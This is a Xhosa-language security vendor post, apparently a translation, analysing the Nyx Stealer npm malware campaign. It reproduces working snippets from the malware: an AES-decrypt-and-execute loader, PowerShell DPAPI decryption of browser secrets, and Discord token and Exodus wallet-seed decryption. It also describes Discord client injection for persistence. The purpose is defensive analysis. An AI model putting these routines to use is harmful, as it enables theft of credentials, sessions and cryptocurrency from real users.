npm Infostealer

Ukufunyanwa kwe-Infostealer entsha ye-npm: Iiseshoni zeDiscord zeNyx Stealer

TL; DR

Iqela loPhando loKhuseleko lwaseXygeni ichonge iphulo le-npm infostealer elinobuchule elihanjiswa ngeepakeji ezimbini ezinobungozi: i-consolelofy kwaye i-selfbot-lofy.

Inguqulelo yamva nje (consolelofy@1.3.0) ifaka i-216KB AES-encrypted payload ekhupha iikhowudi ngexesha lokusebenza kwaye isebenze nge vm.runInNewContext()Ngenxa yokuba i-logic enobubi ibethelelwe ngokupheleleyo, ii-static scanners ezixhomekeke ekuhlolweni kwentambo azikwazi ukubona indlela ezisebenza ngayo de kube lixesha lokuphunyezwa.

Nje ukuba iguqulwe, umthwalo ohlawulelwayo, uphawu lwangaphakathi Umenzi weNyx, ekujoliswe kuko:

  • Iithokheni zokuqinisekisa iDiscord
  • Iivenkile zokuqinisekisa isikhangeli ezingaphezu kwama-50
  • Ulwandiso lwe-wallet ye-cryptocurrency olungaphezulu kwama-90
  • Iiseshoni zeRoblox, Instagram, Spotify, Steam, Telegram, kunye neTikTok
  • Ukuqhubeka komthengi wedesktop yeDiscord

Zonke iinguqulelo ezingama-20 kuzo zombini iipakeji zixeliwe kwaye zaqinisekiswa ukuba zinobungozi.

Isishwankathelo soBugcisa sale npm Infostealer

Ngokungafaniyo ne-malware yesiqhelo ngexesha lokufaka, eli phulo lixhomekeke kwi ixesha lokuqalisa imodeli yokususa ukubethela.

Nazi:

  • Akukho bungozi preinstall or postinstall hooks
  • Akukho minxeba yenethiwekhi ecacileyo ngexesha lokufaka
  • Akukho ngqiqo yokuvuna iziqinisekiso ezicacileyo

Umthwalo womvuzo usebenza xa imodyuli ingenisiwe. Lonke umzimba onobungozi uyabethelwa kwaye ubonakala kuphela kwimemori ngexesha lokusebenza.

Olu yilo luthintela ngokukodwa ukubonwa ngexesha lokufakwa kwephakheji.

Indlela Esebenza Ngayo Le Npm Infostealer

Ngaphambi kokuba sihlalutye into ebiwa yiNyx Stealer, kufuneka siqonde indlela eqhuba ngayo.

Ingqiqo embi ngaphakathi kwale npm infostealer ilandela iphethini ehambelanayo:

Isilayishi esincinci sisusa i-payload enkulu efihliweyo size siyisebenzise ngokuguquguqukayo ngaphakathi komxholo we-Node.js VM.

Olu luyilo lwenziwe ngabom. Umhlaseli akafihli ukusebenza emva kokufiphaza kuphela, bayazifihla ukususa ikhowudi enobungozi ekubonakaleni okungaguqukiyo ngokupheleleyo.

Imodeli yokuSebenza eNqanaba eliPhezulu

Kwinqanaba eliphezulu, isigqubuthelo senza izinto ezine:

  • Ifumana isitshixo se-AES kwigama lokugqitha eliqinileyo kusetyenziswa i-SHA-256
  • Isusa i-ciphertext enkulu ene-hex esebenzisa i-AES-256-CBC
  • Yenza iJavaScript eguqulweyo isebenzisa vm.runInNewContext()
  • Ibonelela ngebhokisi yesanti esatyhila izinto zokuqala ezinamandla zexesha lokusebenza

Isishwankathelo soBuchule obuPhambili

ilungu Uqwalaselo/Ixabiso
Algorithm I-AES-256-CBC
Ukutsalwa okungundoqo I-SHA-256 (igama lokungena)
Ivektha yokuqalisa (IV) Iibhayithi ezili-16 ze-0x00
enze vm.runInNewContext(isusiwe ikhowudi, ibhokisi yesanti)

Ngokubalulekileyo, ibhokisi yesanti idlula:

  • require
  • process
  • Buffer
  • izibambi xesha
  • ukuthunyelwa kwamanye amazwe kwemodyuli

Oku kuthetha ukuba umthwalo okhutshiweyo ugcina amandla apheleleyo oku:

  • Iinkqubo zokuzala
  • Funda kwaye ubhale iifayile
  • Yenza iifowuni zenethiwekhi
  • Guqula usetyenziso lwasekuhlaleni

Le ayisiyo i-VM enomda. Yi-VM esetyenziswa njenge-trampoline yokwenza.

Iphethini yokubethela ngexesha lokusebenza (indlela yokusebenza ephambili)

Isixhobo sokulayisha sincinci.
Umzimba onobubi awunjalo.

Apha ngezantsi kukho indlela yokuphumeza efumaneka ngaphakathi kwiphakheji:

const crypto = require('crypto'); const vm = require('vm');  function decryptAndExecute(encryptedHex, passphrase) {     const key = crypto.createHash('sha256')                       .update(passphrase)                       .digest();      const iv = Buffer.alloc(16, 0);      const decipher = crypto.createDecipheriv('aes-256-cbc', key, iv);     let decrypted = decipher.update(encryptedHex, 'hex', 'utf8');     decrypted += decipher.final('utf8');      const sandbox = {         require,         module,         exports,         console,         process,         Buffer,         __dirname,         __filename,         setTimeout,         setInterval,         clearTimeout,         clearInterval     };      vm.runInNewContext(decrypted, sandbox); }

Kutheni Oku Kubalulekile

Umthwalo ohlawulelwayo oguqulweyo:

  • Ngaba hayi zikho kwi-plaintext ngaphakathi kwiphakheji ye-npm
  • Ayibonakali lula grep okanye ukuskena kwentambo engashukumiyo
  • Ivela kuphela kwimemori ngexesha lokusebenza
  • Isebenzisa amandla apheleleyo e-Node runtime

Olu qhagamshelo lokuphunyezwa kwe-AES + VM luphawu oluqinileyo lokuziphatha kwe- i-npm infostealer izama ukuphepha ukuhlolwa okungaguqukiyo.

Ngamanye amazwi:

Ukuba uskena umthi wemvelaphi yephakheji, awuboni mntu othatha imifanekiso.
Ubona i-decryptor.

Kwenzeka ntoni emva kokususwa kwekhowudi

Nje ukuba isetyenzisiwe, iNyx Stealer iqalisa amaza okuqokelela idatha afanayo.

I-Wave 1: Ukukhutshwa kweCredential yeSikhangeli

I-malware:

  • Khuphela ixesha lokusebenza lePython kwiNuGet CDN
  • Ukufaka iilayibrari ze-cryptographic
  • Iimveliso ezikhutshiweyo ezikwiivenkile zeziqinisekiso ezisekelwe kwiChromium
  • Isusa iimfihlo ezikhuselweyo yi-DPAPI

Endaweni yokuhlanganisa ii-native bindings, isebenzisa iPowerShell ukubiza iWindows DPAPI ngokuthe ngqo.

function dpapiUnprotectWithPowerShell(dataBuf) {     const b64 = dataBuf.toString('base64');      const ps =         "Add-Type -AssemblyName System.Security;" +         "$b=[Convert]::FromBase64String('" + b64 + "');" +         "$p=[System.Security.Cryptography.ProtectedData]::Unprotect(" +         "$b,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser);" +         "[Console]::Out.Write([Convert]::ToBase64String($p))";      const cmd =         `powershell -NoProfile -ExecutionPolicy Bypass -Command "${ps}"`;      return Buffer.from(execSync(cmd, { encoding: 'utf8' }).trim(), 'base64'); }

Le ndlela yokwenza:

  • Iphepha ukuhlanganiswa kwezinto zakudala
  • Isebenzisa ii-API ze-crypto zeWindows zasekhaya
  • Ixutywa nezixhobo zolawulo

Kukucazulula ulwazi lwenqanaba le-OS, kungekhona ukukrwela.

I-Wave 2: Ukususwa kweToken yeDiscord

Umntu ontshontshayo uyazi kakuhle iiprotokholi. Uyaqonda ifomathi yethokheni efihliweyo yeDiscord.

function decryptToken(encryptedToken, key) {     const tokenParts = encryptedToken.split('dQw4w9WgXcQ:');     const encryptedData = Buffer.from(tokenParts[1], 'base64');      const iv = encryptedData.slice(3, 15);     const ciphertext = encryptedData.slice(15, -16);     const tag = encryptedData.slice(-16);      const decipher = crypto.createDecipheriv('aes-256-gcm', key, iv);     decipher.setAuthTag(tag);      return decipher.update(ciphertext).toString('utf8'); }

Ukuhamba komsebenzi:

  • Khipha isitshixo esiyintloko kwiDiscord's Local State
  • Susa ukubethela isitshixo esiyintloko nge-DPAPI
  • Susa ukubethela ii-token blobs ze-AES-GCM
  • Qinisekisa iithokheni ngokuchasene ne-Discord API
  • Nciphisa ngeNitro, iibheji, ulwazi lokuhlawula

Oku akukokulahla iziqinisekiso eziqhelekileyo. Kukuqhekezwa kweseshoni enolwazi ngemigaqo.

I-Wave 3: Ukujoliswa kweWallet ye-Cryptocurrency

I-npm infostealer ibala:

  • Izandiso zewallet zebrowser ezingaphezu kwama-90
  • Iiwallet zedesktop ezingama-27
  • Iindlela zesipaji ezibandayo
  • Iifayile zembewu ye-Exodus

Umzekelo welinge lokususa ukubethela imbewu:

function decryptSeco(content, password) {     const key = crypto.pbkdf2Sync(password, 'exodus', 10000, 32, 'sha512');      const decipher = crypto.createDecipheriv(         'aes-256-gcm',         key,         content.slice(0, 12)     );      decipher.setAuthTag(content.slice(-16));      return Buffer.concat([         decipher.update(content.slice(12, -16)),         decipher.final()     ]).toString('utf8'); }

Ukuba kuphumelele, isivumelwano semali siyakhawuleza kwaye asiyi kuguqulwa.

Oku kubonisa i-vector yokwenza imali exabiso liphezulu kwiphulo.

Ukunyamezela ngeDiscord Desktop Injection

Emva kokufumana iziqinisekiso, iNyx Stealer izama ukuqhubeka ngokutshintsha indlela yokusebenza yendawo. Ingxoxo umthengi.

Ithagethi:

%LOCALAPPDATA%\Discord*\app-*\modules\discord_desktop_core\index.js

Ulandelelwano lokuSebenza

Umphathi we-infostealer wenza la manyathelo alandelayo:

  • Iphelisa ukusebenza kweenkqubo zeDiscord
  • Ifumana ii-Discord variants ezifakiweyo (Stable, Canary, PTB)
  • Ubhala ngaphezulu discord_desktop_core/index.js
  • Ifaka i-webhook logic elawulwa ngumhlaseli
  • Iqalisa kwakhona iDiscord

Oku kuqinisekisa ukuba iiseshoni zeDiscord zexesha elizayo zivuza ngokuzenzekelayo amathokheni amatsha okuqinisekisa.

Okubalulekileyo kukuba, olu qhubekeko aluxhomekekanga kwimisebenzi ecwangcisiweyo okanye kuhlengahlengiso lwerejista. Lusebenzisa ukuguqulwa kwekhowudi kwinqanaba lesicelo, indlela efihlakeleyo.

Nokuba iphakheji ye-npm enobubi isusiwe kamva, iklayenti leDiscord lihlala lisengozini.

Uthelekiso lobuchwephesha: I-Selfbot esemthethweni vs i-npm Infostealer

ilungu Ithala leeNcwadi elisemthethweni I-Nyx npm Infostealer
Encryption nanye Umthwalo opheleleyo obhalwe nge-AES
I-VM yexesha lokusebenza Ayifuneki vm.runInNewContext kuqhutywa
UFikelelo lweNqinisekiso I-Discord API kuphela Isiphequluli, iiwalethi, i-DPAPI
Ukhuphelo lwangaphandle Hayi Ixesha lokusebenza lePython ngeNuGet
Ukunyamezela Hayi Ukufakwa kweklayenti leDiscord
Imali Ukuzenzekela kweBot Ukuthengiswa kwakhona kweziqinisekiso

Umaleko wokubethela wodwa sele wahlula eli phulo kwifolokhwe eqhelekileyo yomthombo ovulekileyo.

I-Discord selfbot esemthethweni ayinaso isizathu sokubethela yonke ikhowudi yayo, ivelise iPowerShell ukuze ifikelele kwi-DPAPI, ikhuphele amaxesha okusebenza angaphandle, okanye iguqule ii-internal zesicelo sedesktop. Xa ezo zakhono zibonakala ngaphakathi kokuxhomekeka okuthi zenzeka ngokuzenzekelayo ukusebenzisana kweDiscord, ukungafani kolwakhiwo akunakwenzeka ukuba kungananzwa.

Ngokwembono yophando, le npm infostealer ishiya umkhondo kwiileya ezininzi. Nangona kunjalo, ezona zibonakaliso zithembekileyo azizo ii-URL eziqinileyo okanye iindlela ezithile zefayile, kuba ezo zinokutshintsha phakathi kweenguqulelo. Endaweni yoko, iimpawu ezihlala ixesha elide zezolwakhiwo.

Kwinqanaba lephakheji, iflegi ebomvu enamandla kukudityaniswa komthwalo omkhulu ofihliweyo kunye ne-runtime decryption wrapper esebenza ngoko nangoko nge vm.runInNewContext()Nangona ukubethela kukodwa kungengobungozi ngokwemvelo, ukusebenzisa i-AES decryption elandelwa kukwenziwa kwe-VM enamandla ngaphakathi kwiphakheji ye-Discord utility kuyinto engaqhelekanga kakhulu.

Kwinqanaba lomsingathi, iipateni ezirhanelekayo ziquka umsebenzi ongalindelekanga we-DPAPI decryption, ukuvela kwenkqubo kwi-Node.js dependency context, kunye nokuguqulwa kweefayile zesicelo sendawo ezingafanele zitshintshwe ziilayibrari zomntu wesithathu. Ngokufanayo, kwi-network layer, unxibelelwano lwe-outbound webhook-style oluqalwe yi-dependence yophuhliso lubonisa enye into engaqhelekanga.

Ngamanye amazwi, umphezulu wokufumanisa awulophawu olunye lokungavisisani. Lulwalamano lwe-encryption, ukuphunyezwa kwexesha lokusebenza, ukufikelela kwiziqinisekiso, kunye nokuziphatha okuqhubekayo okubonisa umngcipheko.

Ukufumanisa kunye nokunciphisa i-Xygeni

npm Infostealer

Le npm infostealer ichongiwe ngu Isilumkiso Sasekuqaleni Se-Malware yeXygeni (MEW) ngokusebenzisa ulwalamano lokuziphatha olunezigaba ezahlukeneyo endaweni yokuthelekisa nje isiginitsha.

Endaweni yokukhangela imicu eyaziwayo enobuthi, i-MEW ivavanya ukungalingani kwesakhiwo kumthi opheleleyo wemvelaphi. Kule meko, ukufunyanwa kwavela ekudibaneni kwemiqondiso eliqela: inkqubo yokuguqulela i-AES kwindawo yokungena kwimodyuli, ukuphunyezwa kwangoko ngaphakathi komxholo we-VM, kunye nokungafani okucacileyo kobuchule ukuya kwinjongo.

Okubalulekileyo kukuba, akukho nanye kwezi mpawu zodwa ezibonisa injongo embi. Nangona kunjalo, xa zihlalutywa kunye, ziveza umzamo wokufihla indlela yokusebenza kwexesha lokusebenza. Le ndlela idibeneyo inciphisa kakhulu iziphumo ezingezizo ezilungileyo ngelixa ichonga izoyikiso zothungelwano lonikezelo oluphezulu.

Ngaphezu koko, eli tyala libonisa isizathu sokuba ukuhlolwa kwexesha lokufaka kuphela kungonelanga. Ingqiqo enobungozi ayihlali kwizikripthi zomjikelo wobomi. Isebenza kuphela emva kokuba imodyuli ilayishiwe kwaye ibonakala kuphela xa isusiwe kwimemori. Ke ngoko, ukhuselo olusebenzayo lufuna uhlalutyo oluqonda ukubethela, ukuqatshelwa kwepateni yokuziphatha, kunye nokubeka esweni ukuxhomekeka okuqhubekayo ngaphaya kweziganeko zokufakela.

Ukususwa kweRegistry kuyasabela. Uhlalutyo oluqaphela ixesha lokusebenza luyathintela.

Kutheni le nto le npm Infostealer ibalulekile

I-Nyx Stealer imele uguquko oluvela kwisakhiwo kwi-malware esekelwe kwi-npm.

Ngokwembali, iipakethe ezininzi ezinobungozi bezixhomekeke kwizikripthi ezibonakalayo zexesha lokufaka okanye kwiindawo zokugqibela zokukhupha iinkcukacha ezicacileyo. Ngokwahlukileyo koko, eli phulo liyayifihla imithwalo yalo, lihlehlisa ukusebenza kwixesha lokusebenza, lisebenzisa ii-API zenkqubo yokusebenza ezisemthethweni, kwaye limisela ukuqina ngaphakathi kwezicelo ezithembekileyo.

Ngenxa yoko, umhlaseli akufuneki asebenzise iziseko ze-npm ngokwazo. Endaweni yoko, uhlaselo luyaphumelela kuba ukufakwa kokuxhomekeka kuthetha ukuthembana. Abaphuhlisi bacinga ukuba ukungenisa ithala leencwadi ngumsebenzi okhuselekileyo, ingakumbi xa uziveza njengefolokhwe enokwenzeka yesixhobo esidumileyo.

Njengoko iinkqubo ze-ecosystem ziqhubeka zikhula kwaye iifolokhwe zisanda, loo mda wokuthembana ongacacanga uba yindawo yokuhlasela enomtsalane ngakumbi. Ke ngoko, ukuzikhusela kwi-npm infostealers zanamhlanje kufuna ukuqonda iipateni zokwakha endaweni yokukhangela imitya engashukumiyo.

Ekugqibeleni, eli phulo liqinisa isifundo esibalulekileyo ku software supply chain security: ezona zisongelo ziyingozi kakhulu azizo ezo zibonakala zinobungozi xa uzijonga ekuqaleni, kodwa zezo zibonakala zisemthethweni ngokwesakhiwo de kube lixesha lokuqalisa lityhile indlela eziziphatha ngayo ngokwenene.

izixhobo-zohlalutyo-lwesoftware-yokwakhiwa kwesoftware
Beka phambili, ulungise, kwaye ukhusele iingozi zesoftware yakho
Fumana iAkhawunti yakho yasimahla.
Akukho khadi lekhredithi elifunekayo.

Khusela uPhuhliso lweSoftware yakho kunye nokuHanjiswa kwayo

kunye neXygeni Product Suite